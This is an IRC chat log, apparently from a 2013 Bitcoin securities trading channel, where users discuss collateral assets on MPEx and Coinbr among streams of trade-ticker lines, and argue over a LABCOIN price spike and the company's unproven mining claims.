an editable section Sep 09 21:15:42 or update the description every time like done on bitfunder Sep 09 21:15:44 [BTCTC] [LABCOIN] 5 @ 0.003598 = 0.018 BTC [-] Sep 09 21:15:50 oh, which one is it? Sep 09 21:16:02 all are editable except the Contract section i think Sep 09 21:16:44 maybe put it in Definition of the Market or Products and Services Sep 09 21:16:54 he really should add more general section Sep 09 21:16:59 Notes Sep 09 21:17:01 or such Sep 09 21:17:20 yes, but it marks the asset was updated... isn't that a problem, doesn't it require everyone to vote again? Sep 09 21:17:20 to change the Contract section, yes Sep 09 21:17:21 but not the rest Sep 09 21:17:23 (i think) Sep 09 21:17:35 surely Burnside would work with you on this Sep 09 21:17:43 as it's a special need Sep 09 21:17:44 yea, will ask Sep 09 21:18:30 ;;nethash Sep 09 21:18:31 766680.491245 Sep 09 21:18:35 ;;estimate Sep 09 21:18:37 Next difficulty estimate | 102471059.102 based on data since last change | 107102393.074 based on data for last three days Sep 09 21:18:47 ;;bcstats Sep 09 21:18:49 Current Blocks: 256977 | Current Difficulty: 8.693301777119441E7 | Next Difficulty At Block: 258047 | Next Difficulty In: 1070 blocks | Next Difficulty In About: 5 days, 11 hours, 41 minutes, and 32 seconds | Next Difficulty Estimate: 102471059.102 | Estimated Percent Change: 17.87358 Sep 09 21:18:53 ThickAsThieves: "products and services" and others (i assume besides contract) are editable all the time w/o vote? Sep 09 21:19:05 there will be some updates, thinking about creating new asset to resell collateral DMS-style Sep 09 21:19:05 lemme check for sure Sep 09 21:19:13 thanks Sep 09 21:19:27 Yes Sep 09 21:19:35 all sections except Contract are editable Sep 09 21:19:41 good to know Sep 09 21:20:22 Burnside has added Country info to the shareholders list Sep 09 21:20:25 pretty interesting Sep 09 21:20:32 much less US than I expected Sep 09 21:20:40 mircea_popescu: would not be bad to inspire yourself, too... the collateral for options and futures can be really a deadweight Sep 09 21:20:46 [BTCTC] [DMS.PURCHASE] 15 @ 0.01205 = 0.1808 BTC [-] Sep 09 21:21:04 jurov hm ? Sep 09 21:21:40 to create another asset for it that will pay out what was left from future payout Sep 09 21:21:55 so that it can be sold without waiting for the future to expire Sep 09 21:22:31 is this any different than what this guy is planning to do? https://bitcointalk.org/index.php?topic=288765.msg1521109;topicseen#new Sep 09 21:22:32 jurov explain this to me like i were 5. Sep 09 21:22:35 [BTCTC] [DMS.PURCHASE] 1 @ 0.01205 BTC [-] Sep 09 21:22:45 (i still havent read it) Sep 09 21:23:29 so,when i do MKFUT IDIFF I'll get some amount of futures Sep 09 21:24:14 country info.. um i don't remember to enter any information about my location on registration, could it be that it's synct with the "time zone" settings? Sep 09 21:24:15 the proposal is for MKFUT to create equal amount of complementary asset Sep 09 21:24:49 dexx7, i suspect it's based on IP Sep 09 21:24:49 jurov you basically want another implementation of the brendio/deprived/tat thing / Sep 09 21:24:50 ? Sep 09 21:25:05 yes. payout for future would be as now, payout for complementary would be collateral - (future payout) Sep 09 21:25:08 oh wait, there is "county" in the account settings Sep 09 21:25:15 so make it. Sep 09 21:25:23 [HAVELOCK] [XBOND] 1 @ 0.0011 BTC [+] Sep 09 21:25:45 hmmm sure... but it would not be traded on mpex then Sep 09 21:25:49 why not ? Sep 09 21:25:50 for the record, there is not a "tat thing" in that regard Sep 09 21:25:59 [BTCTC] [LABCOIN] 160 @ 0.003598 = 0.5757 BTC [-] Sep 09 21:26:00 [BTCTC] [LABCOIN] 5340 @ 0.0036 = 19.224 BTC [+] Sep 09 21:26:00 make a nice contract, email it, we can get it going. Sep 09 21:26:11 ThickAsThieves weren't you making something similar with mining ? Sep 09 21:26:28 was considering, but eltopo and jurov seem to have it covered Sep 09 21:26:29 ah so... but it depends on the functionality being buil it to mpex, no? Sep 09 21:26:37 jurov what specifically ? Sep 09 21:27:04 Deprived manages it all himself jurov Sep 09 21:27:12 exchange acts as normal Sep 09 21:27:15 or do you mean only coinbr would be able to issue the complementary asset when MKFUT will be done by its users? Sep 09 21:27:44 and it will hadle the dividend, too.. well, it's workable Sep 09 21:27:55 sure. Sep 09 21:28:15 you might also be able to buy a copy of deprived's automation script if it's of any use here Sep 09 21:28:51 [BTCTC] [TAT.VIRTUALMINE] 21 @ 0.000617 = 0.013 BTC [-] Sep 09 21:28:52 [BTCTC] [TAT.VIRTUALMINE] 49 @ 0.000618 = 0.0303 BTC [+] Sep 09 21:28:54 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.000618 = 0.0185 BTC [+] Sep 09 21:29:14 [BTCTC] [ACTIVEMINING] 10 @ 0.003254 = 0.0325 BTC [-] Sep 09 21:29:15 [BTCTC] [ACTIVEMINING] 90 @ 0.003253 = 0.2928 BTC [-] Sep 09 21:29:52 ic Sep 09 21:30:02 [BTCTC] [DMS.MINING] 1 @ 0.002739 BTC [+] Sep 09 21:30:38 [BTCTC] [DMS.MINING] 40 @ 0.002512 = 0.1005 BTC [-] Sep 09 21:30:40 [BTCTC] [DMS.MINING] 2 @ 0.00251 = 0.005 BTC [-] Sep 09 21:30:41 [BTCTC] [DMS.MINING] 58 @ 0.002508 = 0.1455 BTC [-] Sep 09 21:32:10 [BTCTC] [BTC-GROWTH] 6 @ 0.1011 = 0.6066 BTC [+] Sep 09 21:33:08 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.000617 = 0.0012 BTC [-] Sep 09 21:33:51 um, maybe there could be just one complementary issued by coinbr for all cases when customer provides a collateral to coinbr/mpex Sep 09 21:33:59 that will pay out dividends both for idiff-e, idiff-o and options expiration Sep 09 21:34:22 seems sufficiently crazy to actually do it :D Sep 09 21:34:22 isn't that an issue of pooling different things tho ? Sep 09 21:34:38 [BTCTC] [LTC-ATF.B2] 44 @ 0.0105 = 0.462 BTC [-] Sep 09 21:34:39 [BTCTC] [LTC-ATF.B2] 69 @ 0.01049 = 0.7238 BTC [-] Sep 09 21:34:57 yes, at least options hould be kept separately Sep 09 21:37:12 [BTCTC] [DMS.SELLING] 5 @ 0.009553 = 0.0478 BTC [+] Sep 09 21:37:45 not to speak out of turn, but couldnt you list the main asset directly on coinbr and automate to your heart's content? Sep 09 21:37:58 [BTCTC] [BMF] 15 @ 0.01226 = 0.1839 BTC [-] Sep 09 21:38:26 [BTCTC] [DMS.PURCHASE] 1 @ 0.01161 BTC [-] Sep 09 21:39:09 what do you mean? yes, technically it will be done by coinbr, not by email as now Sep 09 21:39:59 while i see plenty reason to have it represented on mpex, i'm under the impression you want to use the mpex instances as the underlying Sep 09 21:40:00 ThickAsThieves why turn things into a black box for the market ? Sep 09 21:40:16 that's going backwards. Sep 09 21:40:25 [BTCTC] [LABCOIN] 143 @ 0.003598 = 0.5145 BTC [-] Sep 09 21:40:25 i suppose Sep 09 21:40:26 [BTCTC] [LABCOIN] 1307 @ 0.0036 = 4.7052 BTC [+] Sep 09 21:40:55 [BTCTC] [LABCOIN] 5 @ 0.003504 = 0.0175 BTC [-] Sep 09 21:40:59 i'm also not clear on coinbr's mission Sep 09 21:41:11 [BTCTC] [LABCOIN] 13 @ 0.003504 = 0.0456 BTC [-] Sep 09 21:41:12 what i'm on is the need for complementary to expire the same time as the main , and from that follows need to have extra complementary for every future Sep 09 21:41:44 jurov which is why i run quarterlies. Sep 09 21:41:52 makes things much simpler to admin. Sep 09 21:42:35 eltopo's will be per diff change Sep 09 21:42:40 [BTCTC] [LABCOIN] 11 @ 0.003503 = 0.0385 BTC [-] Sep 09 21:42:50 [HAVELOCK] [SDSTM] 25 @ 0.00310002 = 0.0775 BTC [-] Sep 09 21:42:51 also going the wrong way. Sep 09 21:43:08 would be nice to have all options personally Sep 09 21:43:34 yes i know about eltopo, it's not considered a threat or so Sep 09 21:43:53 not mentioning it in that context per se Sep 09 21:43:59 [BTCTC] [LABCOIN] 71 @ 0.0035 = 0.2485 BTC [-] Sep 09 21:44:01 just that it's relevant Sep 09 21:44:12 as a buyer/shorter i'd use em all Sep 09 21:44:15 and about the mission, we are still pretty much in experimental territory and this is just another service. Sep 09 21:44:32 which happens to help immensely with coinbr cash flow Sep 09 21:44:46 even when it's net loss at expiration Sep 09 21:44:57 do you intend to take some time to plan a path for coinbr? Sep 09 21:45:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.02321 = 0.2321 BTC [-] Sep 09 21:45:04 or just organically see what happens? Sep 09 21:46:01 well, the vision is to provide some cross-exchange functionality... but it remains to be seen how many will actually stand Sep 09 21:46:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.0232 = 0.0464 BTC [-] Sep 09 21:46:20 so the plans are rather fluid Sep 09 21:47:42 [HAVELOCK] [LABCO] 1000 @ 0.0033 = 3.3 BTC [-] Sep 09 21:48:56 [HAVELOCK] [LABCO] 518 @ 0.0034999 = 1.8129 BTC [+] Sep 09 21:49:10 [HAVELOCK] [XBOND] 90 @ 0.00109 = 0.0981 BTC [-] Sep 09 21:52:24 [BTCTC] [ACTIVEMINING] 10 @ 0.003447 = 0.0345 BTC [+] Sep 09 21:53:27 New chat for bitcoins & new investment webpage. PM for more information & referal link!!!!!!!!! Sep 09 21:53:27 New chat for bitcoins & new investment webpage. PM for more information & referal link!!!!!!!!! Sep 09 21:54:09 YAY! Sep 09 21:54:21 !!!! Sep 09 21:55:19 New chat for bitcoins & new investment webpage - http://growcoins.com Sep 09 21:55:21 i dont know how to PM Sep 09 21:55:26 how do i get in this new chat?! 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Sep 09 22:01:36 Shhhh Sep 09 22:01:38 top secret Sep 09 22:01:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.0232 BTC [-] Sep 09 22:02:07 [BTCTC] [LABCOIN] 123 @ 0.003598 = 0.4426 BTC [+] Sep 09 22:02:08 [BTCTC] [LABCOIN] 1487 @ 0.0036 = 5.3532 BTC [+] Sep 09 22:02:10 [BTCTC] [LABCOIN] 313 @ 0.0036 = 1.1268 BTC [+] Sep 09 22:02:11 [BTCTC] [LABCOIN] 98 @ 0.003637 = 0.3564 BTC [+] Sep 09 22:02:11 [BTCTC] [LABCOIN] 51 @ 0.003665 = 0.1869 BTC [+] Sep 09 22:02:12 [BTCTC] [LABCOIN] 150 @ 0.003678 = 0.5517 BTC [+] Sep 09 22:02:13 [BTCTC] [LABCOIN] 129 @ 0.003679 = 0.4746 BTC [+] Sep 09 22:02:14 [BTCTC] [LABCOIN] 1 @ 0.00368 BTC [+] Sep 09 22:02:15 [BTCTC] [LABCOIN] 1000 @ 0.00368 = 3.68 BTC [+] Sep 09 22:02:16 [BTCTC] [LABCOIN] 285 @ 0.00368 = 1.0488 BTC [+] Sep 09 22:02:17 [BTCTC] [LABCOIN] 49 @ 0.003693 = 0.181 BTC [+] Sep 09 22:02:19 o yes Sep 09 22:02:19 [BTCTC] [LABCOIN] 3000 @ 0.003696 = 11.088 BTC [+] Sep 09 22:02:20 [BTCTC] [LABCOIN] 1975 @ 0.003697 = 7.3016 BTC [+] Sep 09 22:02:21 [BTCTC] [LABCOIN] 400 @ 0.003699 = 1.4796 BTC [+] Sep 09 22:02:22 [BTCTC] [LABCOIN] 104 @ 0.003699 = 0.3847 BTC [+] Sep 09 22:02:22 [BTCTC] [LABCOIN] 5825 @ 0.0037 = 21.5525 BTC [+] Sep 09 22:02:23 [BTCTC] [LABCOIN] 50 @ 0.003721 = 0.1861 BTC [+] Sep 09 22:02:24 [BTCTC] [LABCOIN] 20 @ 0.003735 = 0.0747 BTC [+] Sep 09 22:02:25 [BTCTC] [LABCOIN] 1 @ 0.00374 BTC [+] Sep 09 22:02:26 [BTCTC] [LABCOIN] 150 @ 0.003749 = 0.5624 BTC [+] Sep 09 22:02:27 [BTCTC] [LABCOIN] 50 @ 0.003749 = 0.1875 BTC [+] Sep 09 22:02:28 [BTCTC] [LABCOIN] 150 @ 0.003764 = 0.5646 BTC [+] Sep 09 22:02:29 [BTCTC] [LABCOIN] 499 @ 0.00377 = 1.8812 BTC [+] Sep 09 22:02:30 [BTCTC] [LABCOIN] 2312 @ 0.003775 = 8.7278 BTC [+] Sep 09 22:02:31 [BTCTC] [LABCOIN] 52 @ 0.003777 = 0.1964 BTC [+] Sep 09 22:02:31 [BTCTC] [LABCOIN] 309 @ 0.003789 = 1.1708 BTC [+] Sep 09 22:02:32 [BTCTC] [LABCOIN] 109 @ 0.003789 = 0.413 BTC [+] Sep 09 22:02:33 [BTCTC] [LABCOIN] 891 @ 0.003789 = 3.376 BTC [+] Sep 09 22:02:34 [BTCTC] [LABCOIN] 417 @ 0.00379 = 1.5804 BTC [+] Sep 09 22:02:35 damn there's the money Sep 09 22:02:35 [BTCTC] [TAT.MINIGAME] 83 @ 0.0002505 = 0.0208 BTC [-] Sep 09 22:02:39 Lets just say that TAT.KLEECKSCOCK is will be worth going *long* on. Sep 09 22:02:46 [BTCTC] [ASICMINER-PT] 1 @ 2.439 BTC [-] Sep 09 22:02:47 https://bitcointalk.org/index.php?topic=263445.msg3115825#msg3115825 Sep 09 22:03:02 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 09 22:03:20 [BTCTC] [LABCOIN] 383 @ 0.00379 = 1.4516 BTC [+] Sep 09 22:03:20 [BTCTC] [LABCOIN] 100 @ 0.00379 = 0.379 BTC [+] Sep 09 22:03:20 [BTCTC] [LABCOIN] 500 @ 0.00379 = 1.895 BTC [+] Sep 09 22:03:20 [BTCTC] [LABCOIN] 200 @ 0.003798 = 0.7596 BTC [+] Sep 09 22:03:20 [BTCTC] [LABCOIN] 17 @ 0.003799 = 0.0646 BTC [+] Sep 09 22:03:21 buy all the labcoins! Sep 09 22:03:22 [BTCTC] [LABCOIN] 33 @ 0.003799 = 0.1254 BTC [+] Sep 09 22:03:23 [BTCTC] [LABCOIN] 37 @ 0.003799 = 0.1406 BTC [+] Sep 09 22:03:35 [BTCTC] [LABCOIN] 463 @ 0.003799 = 1.7589 BTC [+] Sep 09 22:03:36 [BTCTC] [LABCOIN] 99 @ 0.003805 = 0.3767 BTC [+] Sep 09 22:03:37 [BTCTC] [LABCOIN] 38 @ 0.003815 = 0.145 BTC [+] Sep 09 22:03:40 Activity: 89 Sep 09 22:03:40 Labcoin.com Sep 09 22:03:40 View Profile WWW Email Personal Message (Online) Sep 09 22:03:40 Trust: 0: -0 / +0(0) Sep 09 22:03:40 Ignore Sep 09 22:03:40 Sep 09 22:03:42 Re: [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 09 22:03:44 Today at 03:01:09 PM Sep 09 22:03:50 Reply with quote #6107 Sep 09 22:03:52 And here it comes, finally, today we are proud to announce the starting of mining operations in time with our roadmap. Sep 09 22:03:53 [BTCTC] [LABCOIN] 150 @ 0.003815 = 0.5723 BTC [+] Sep 09 22:03:54 [HAVELOCK] [SDSTM] 7 @ 0.00310002 = 0.0217 BTC [-] Sep 09 22:03:55 The last week has been extremely busy and work is still in progress to bring online the whole hashing power. Sep 09 22:03:58 We're currently averaging about 2 TH/s in solo mode, and expect to deploy at least 4 TH by monday 16, to reach gradually 50 TH within October. Sep 09 22:04:03 The website will be updated this week in order to show our live hashing rate and dividends will be paid every two weeks. Sep 09 22:04:06 More pictures of the laboratory setting where the hardware is currently deployed will be also distributed. Complete installment will be shown when our final premise will be ready. We're still considering some business aspects, including only focusing on the upcoming 65nm version for what concerns bulk chip sales. We plan to take a final decision regarding this issue during the next month. Sep 09 22:04:07 You suck at this Kleeck Sep 09 22:04:09 soooo Sep 09 22:04:11 We want to say thanks to all investors who trusted us during this long endeavor. Sep 09 22:04:13 We will be here for about one hour to answer questions. Sep 09 22:04:16 why not show proof of hashing? Sep 09 22:04:16 [BTCTC] [LABCOIN] 300 @ 0.003815 = 1.1445 BTC [+] Sep 09 22:04:19 Labcoin Team Sep 09 22:04:21 Shhhhh Sep 09 22:04:30 [BTCTC] [LABCOIN] 400 @ 0.003815 = 1.526 BTC [+] Sep 09 22:04:34 Let me make my millions first before you go killing the pump again Sep 09 22:04:40 https://bitcointalk.org/index.php?topic=263445.msg3110872#msg3110872 Sep 09 22:04:42 [BTCTC] [LABCOIN] 543 @ 0.003815 = 2.0715 BTC [+] Sep 09 22:04:43 ;) Sep 09 22:04:44 [BTCTC] [LABCOIN] 160 @ 0.003819 = 0.611 BTC [+] Sep 09 22:04:44 [BTCTC] [LABCOIN] 210 @ 0.003819 = 0.802 BTC [+] Sep 09 22:04:45 [BTCTC] [LABCOIN] 2 @ 0.00382 = 0.0076 BTC [+] Sep 09 22:04:45 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 09 22:04:46 [BTCTC] [LABCOIN] 1000 @ 0.003824 = 3.824 BTC [+] Sep 09 22:04:47 :D Sep 09 22:04:47 [BTCTC] [LABCOIN] 1350 @ 0.003827 = 5.1665 BTC [+] Sep 09 22:04:48 [BTCTC] [LABCOIN] 52 @ 0.003833 = 0.1993 BTC [+] Sep 09 22:04:49 [BTCTC] [LABCOIN] 500 @ 0.00384 = 1.92 BTC [+] Sep 09 22:04:50 [BTCTC] [LABCOIN] 200 @ 0.003844 = 0.7688 BTC [+] Sep 09 22:04:51 [BTCTC] [LABCOIN] 1500 @ 0.003844 = 5.766 BTC [+] Sep 09 22:04:52 [BTCTC] [LABCOIN] 4250 @ 0.003845 = 16.3413 BTC [+] Sep 09 22:04:53 [BTCTC] [LABCOIN] 678 @ 0.003848 = 2.6089 BTC [+] Sep 09 22:04:54 [BTCTC] [LABCOIN] 700 @ 0.003848 = 2.6936 BTC [+] Sep 09 22:04:55 [BTCTC] [LABCOIN] 300 @ 0.003848 = 1.1544 BTC [+] Sep 09 22:04:55 [BTCTC] [LABCOIN] 200 @ 0.003849 = 0.7698 BTC [+] Sep 09 22:04:56 [BTCTC] [LABCOIN] 100 @ 0.003849 = 0.3849 BTC [+] Sep 09 22:04:57 TO. THE. MOON. Sep 09 22:04:57 [BTCTC] [LABCOIN] 1000 @ 0.00385 = 3.85 BTC [+] Sep 09 22:05:23 [BTCTC] [ACTIVEMINING] 1 @ 0.003254 BTC [-] Sep 09 22:05:47 [BTCTC] [LABCOIN] 754 @ 0.003868 = 2.9165 BTC [+] Sep 09 22:05:48 [BTCTC] [ACTIVEMINING] 200 @ 0.003254 = 0.6508 BTC [-] Sep 09 22:05:51 [BTCTC] [LABCOIN] 1241 @ 0.00387 = 4.8027 BTC [+] Sep 09 22:05:52 [BTCTC] [ACTIVEMINING] 73 @ 0.003253 = 0.2375 BTC [-] Sep 09 22:05:53 [BTCTC] [LABCOIN] 200 @ 0.00387 = 0.774 BTC [+] Sep 09 22:05:54 [BTCTC] [LABCOIN] 2005 @ 0.00387 = 7.7594 BTC [+] Sep 09 22:05:55 [BTCTC] [ACTIVEMINING] 200 @ 0.003253 = 0.6506 BTC [-] Sep 09 22:05:56 [BTCTC] [LABCOIN] 4 @ 0.003876 = 0.0155 BTC [+] Sep 09 22:06:00 btw, tiberius says hi... sold all his mpex assets via coinbr and explained me how he observed mircea trading s.bbet with himself Sep 09 22:06:07 [BTCTC] [LABCOIN] 297 @ 0.003876 = 1.1512 BTC [+] Sep 09 22:06:12 good for him Sep 09 22:06:14 [BTCTC] [LABCOIN] 70 @ 0.003876 = 0.2713 BTC [+] Sep 09 22:06:16 [BTCTC] [LABCOIN] 400 @ 0.003877 = 1.5508 BTC [+] Sep 09 22:06:17 [BTCTC] [LABCOIN] 2540 @ 0.003878 = 9.8501 BTC [+] Sep 09 22:06:18 [BTCTC] [LABCOIN] 1200 @ 0.003878 = 4.6536 BTC [+] Sep 09 22:06:23 [BTCTC] [LABCOIN] 97 @ 0.003879 = 0.3763 BTC [+] Sep 09 22:06:25 [BTCTC] [ACTIVEMINING] 1500 @ 0.00325 = 4.875 BTC [-] Sep 09 22:06:26 [BTCTC] [LABCOIN] 103 @ 0.003879 = 0.3995 BTC [+] Sep 09 22:06:28 [BTCTC] [LABCOIN] 2500 @ 0.00388 = 9.7 BTC [+] Sep 09 22:06:28 [BTCTC] [LABCOIN] 1000 @ 0.003888 = 3.888 BTC [+] Sep 09 22:06:29 [BTCTC] [LABCOIN] 1000 @ 0.00389 = 3.89 BTC [+] Sep 09 22:06:30 [BTCTC] [LABCOIN] 270 @ 0.003896 = 1.0519 BTC [+] Sep 09 22:06:31 [BTCTC] [LABCOIN] 127 @ 0.003896 = 0.4948 BTC [+] Sep 09 22:06:33 [BTCTC] [ACTIVEMINING] 200 @ 0.003253 = 0.6506 BTC [+] Sep 09 22:06:34 [BTCTC] [LABCOIN] 200 @ 0.003896 = 0.7792 BTC [+] Sep 09 22:06:36 [BTCTC] [ACTIVEMINING] 152 @ 0.003253 = 0.4945 BTC [+] Sep 09 22:06:50 Though I really do agree with you tat Sep 09 22:06:54 [BTCTC] [LABCOIN] 800 @ 0.003896 = 3.1168 BTC [+] Sep 09 22:07:10 [BTCTC] [LABCOIN] 373 @ 0.003896 = 1.4532 BTC [+] Sep 09 22:07:11 [BTCTC] [LABCOIN] 200 @ 0.003897 = 0.7794 BTC [+] Sep 09 22:07:11 [BTCTC] [LABCOIN] 1 @ 0.0039 BTC [+] Sep 09 22:07:13 [BTCTC] [LABCOIN] 1000 @ 0.0039 = 3.9 BTC [+] Sep 09 22:07:18 they are too amazing to need some proofs Sep 09 22:07:26 it's obnoxious Sep 09 22:07:27 jurov: give him our love Sep 09 22:07:31 AMAZING COMPANY Sep 09 22:07:40 all they need to do is throw the hashing on a public pool for like a day Sep 09 22:07:52 even then, Sep 09 22:08:02 it's probly just avalon batch 1's they got 2nd hand Sep 09 22:08:03 Yeah I know Sep 09 22:08:05 need pics Sep 09 22:08:11 [BTCTC] [ACTIVEMINING] 9 @ 0.003202 = 0.0288 BTC [-] Sep 09 22:08:12 [BTCTC] [ACTIVEMINING] 2178 @ 0.0032 = 6.9696 BTC [-] Sep 09 22:08:24 SPECS ARENT READY FOR PUBLIC VIEWING Sep 09 22:08:29 pics + verifiable hashometer Sep 09 22:08:34 put the pipe down kleeck_ Sep 09 22:08:36 proof isnt ready for disproving Sep 09 22:08:38 [BTCTC] [LABCOIN] 1000 @ 0.00393 = 3.93 BTC [+] Sep 09 22:08:39 VISIT #KLEECKSCOCK FOR MORE INFORMATION Sep 09 22:08:58 [BTCTC] [LABCOIN] 130 @ 0.003931 = 0.511 BTC [+] Sep 09 22:08:59 [BTCTC] [LABCOIN] 2450 @ 0.00394 = 9.653 BTC [+] Sep 09 22:09:00 [BTCTC] [LABCOIN] 100 @ 0.003942 = 0.3942 BTC [+] Sep 09 22:09:02 [BTCTC] [LABCOIN] 1000 @ 0.00395 = 3.95 BTC [+] Sep 09 22:09:03 [BTCTC] [LABCOIN] 1 @ 0.003967 BTC [+] Sep 09 22:09:04 [BTCTC] [LABCOIN] 1319 @ 0.003967 = 5.2325 BTC [+] Sep 09 22:09:09 He says he's mining in solo mode. << is that reasonable with 2 th/s? Sep 09 22:09:13 [BTCTC] [ACTIVEMINING] 857 @ 0.0032 = 2.7424 BTC [-] Sep 09 22:09:16 [BTCTC] [LABCOIN] 1 @ 0.003931 BTC [-] Sep 09 22:09:26 [BTCTC] [LABCOIN] 150 @ 0.00392 = 0.588 BTC [-] Sep 09 22:09:38 [BTCTC] [LABCOIN] 300 @ 0.00392 = 1.176 BTC [-] Sep 09 22:09:54 [BTCTC] [LABCOIN] 17 @ 0.00392 = 0.0666 BTC [-] Sep 09 22:10:00 jurov explained me how he observed mircea trading s.bbet with himself << how did that go ? Sep 09 22:10:09 everything is reasonable in labcoin work, no? Sep 09 22:10:25 dexX7 you could in principle solo mine with any arbitrary hash. Sep 09 22:10:48 [BTCTC] [LABCOIN] 700 @ 0.00392 = 2.744 BTC [-] Sep 09 22:11:05 [BTCTC] [LABCOIN] 1832 @ 0.00392 = 7.1814 BTC [-] Sep 09 22:11:32 [BTCTC] [ACTIVEMINING] 25 @ 0.003201 = 0.08 BTC [+] Sep 09 22:11:36 lets say this is real, what is a reasonable peaking price for this do you think? Sep 09 22:12:12 [BTCTC] [LABCOIN] 20 @ 0.003967 = 0.0793 BTC [+] Sep 09 22:12:28 Rulother rehash the basics. are we discussing the lifetime value of 50th going live in october ? Sep 09 22:12:32 mircea_popescu: i didn't ask if it's possible, but reasonable Sep 09 22:12:37 2th Sep 09 22:12:38 current Sep 09 22:12:49 dexX7 what i mean is there's no impediment really. Sep 09 22:12:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.02312 = 0.0462 BTC [-] Sep 09 22:12:55 [BTCTC] [TAT.ASICMINER] 10 @ 0.02311 = 0.2311 BTC [-] Sep 09 22:13:06 [BTCTC] [LABCOIN] 68 @ 0.00392 = 0.2666 BTC [-] Sep 09 22:13:07 [BTCTC] [LABCOIN] 195 @ 0.003896 = 0.7597 BTC [-] Sep 09 22:13:26 the service was good and the site was good too but mp is running a boiler room scam he manipulates the price with his own bid /ask Sep 09 22:13:33 i knew today after i sold the bid/asks would change and they did because he brought them back in line Sep 09 22:13:42 on bbet which wasnt very active he would constantly produce new asks Sep 09 22:13:51 uh. Sep 09 22:13:52 of 10,000 or 20,000 in size Sep 09 22:14:00 [BTCTC] [LABCOIN] 2000 @ 0.003949 = 7.898 BTC [+] Sep 09 22:14:01 to guarantee it was only his shares getting sold at all times Sep 09 22:14:18 it's so ridiculous, as i've never sold any. Sep 09 22:14:23 [BTCTC] [LABCOIN] 5 @ 0.003921 = 0.0196 BTC [-] Sep 09 22:14:25 [BTCTC] [LABCOIN] 2740 @ 0.003709 = 10.1627 BTC [-] Sep 09 22:14:42 oh, that could have benn anyone. i had such a bot too Sep 09 22:14:48 no because he had infinite supply Sep 09 22:14:58 what he does is ensure there is a wide bid/ask spread Sep 09 22:15:00 [BTCTC] [LABCOIN] 400 @ 0.0039 = 1.56 BTC [+] Sep 09 22:15:02 [BTCTC] [LABCOIN] 2300 @ 0.00393 = 9.039 BTC [+] Sep 09 22:15:02 whoa infinity Sep 09 22:15:07 iberiusiv> and since its so thinly traded Sep 09 22:15:12 ;;gentime 2000000 Sep 09 22:15:13 The average time to generate a block at 2000000.0 Mhps, given difficulty of 86933017.7712, is 2 days, 3 hours, 51 minutes, and 30 seconds Sep 09 22:15:13 you can tell when he does it Sep 09 22:15:15 [BTCTC] [LABCOIN] 190 @ 0.003899 = 0.7408 BTC [-] Sep 09 22:15:22 so that's it Sep 09 22:15:30 Rulother i'd guess the 2th are worth about 20 blocks roughly speaking. Sep 09 22:16:46 [BTCTC] [LABCOIN] 7 @ 0.003929 = 0.0275 BTC [+] Sep 09 22:17:19 [BTCTC] [ACTIVEMINING] 1 @ 0.003203 BTC [+] Sep 09 22:17:54 [BTCTC] [LABCOIN] 48 @ 0.003929 = 0.1886 BTC [+] Sep 09 22:18:08 [BTCTC] [TAT.ASICMINER] 13 @ 0.02275 = 0.2958 BTC [-] Sep 09 22:18:57 [BTCTC] [LABCOIN] 600 @ 0.003805 = 2.283 BTC [-] Sep 09 22:18:58 [BTCTC] [LABCOIN] 400 @ 0.003803 = 1.5212 BTC [-] Sep 09 22:19:00 [BTCTC] [LABCOIN] 1000 @ 0.0038 = 3.8 BTC [-] Sep 09 22:19:01 [BTCTC] [LABCOIN] 100 @ 0.003761 = 0.3761 BTC [-] Sep 09 22:19:02 [BTCTC] [LABCOIN] 400 @ 0.00376 = 1.504 BTC [-] Sep 09 22:19:26 [BTCTC] [LABCOIN] 1 @ 0.003925 BTC [+] Sep 09 22:20:14 [BTCTC] [LABCOIN] 200 @ 0.00385 = 0.77 BTC [-] Sep 09 22:20:21 [BTCTC] [LABCOIN] 400 @ 0.00385 = 1.54 BTC [-] Sep 09 22:20:24 [BTCTC] [DMS.MINING] 1 @ 0.002798 BTC [+] Sep 09 22:20:51 [BTCTC] [LABCOIN] 100 @ 0.003728 = 0.3728 BTC [-] Sep 09 22:21:00 [BTCTC] [LABCOIN] 236 @ 0.003798 = 0.8963 BTC [+] Sep 09 22:21:41 [BTCTC] [LABCOIN] 3 @ 0.00379 = 0.0114 BTC [-] Sep 09 22:22:03 [BTCTC] [LABCOIN] 100 @ 0.003788 = 0.3788 BTC [-] Sep 09 22:22:27 [BTCTC] [LABCOIN] 931 @ 0.00375 = 3.4913 BTC [-] Sep 09 22:22:40 [BTCTC] [LABCOIN] 80 @ 0.00378 = 0.3024 BTC [+] Sep 09 22:22:43 [BTCTC] [LABCOIN] 105 @ 0.003778 = 0.3967 BTC [-] Sep 09 22:22:44 [BTCTC] [LABCOIN] 320 @ 0.00378 = 1.2096 BTC [+] Sep 09 22:22:46 [BTCTC] [LABCOIN] 5 @ 0.003787 = 0.0189 BTC [+] Sep 09 22:22:47 [BTCTC] [LABCOIN] 500 @ 0.003789 = 1.8945 BTC [+] Sep 09 22:22:48 [BTCTC] [LABCOIN] 2504 @ 0.003798 = 9.5102 BTC [+] Sep 09 22:22:49 [BTCTC] [LABCOIN] 176 @ 0.003896 = 0.6857 BTC [+] Sep 09 22:22:50 [BTCTC] [LABCOIN] 42 @ 0.003897 = 0.1637 BTC [+] Sep 09 22:22:50 [BTCTC] [LABCOIN] 2630 @ 0.003898 = 10.2517 BTC [+] Sep 09 22:22:59 to the moon! Sep 09 22:23:00 [BTCTC] [LABCOIN] 105 @ 0.003898 = 0.4093 BTC [+] Sep 09 22:23:01 [BTCTC] [LABCOIN] 2069 @ 0.003898 = 8.065 BTC [+] Sep 09 22:23:13 [BTCTC] [LABCOIN] 105 @ 0.003898 = 0.4093 BTC [+] Sep 09 22:23:27 [BTCTC] [LABCOIN] 4374 @ 0.003898 = 17.0499 BTC [+] Sep 09 22:23:43 [BTCTC] [ACTIVEMINING] 2 @ 0.003204 = 0.0064 BTC [+] Sep 09 22:24:24 [BTCTC] [ACTIVEMINING] 158 @ 0.003201 = 0.5058 BTC [-] Sep 09 22:24:47 ;;help Sep 09 22:24:48 The bot responds when you start a line with the 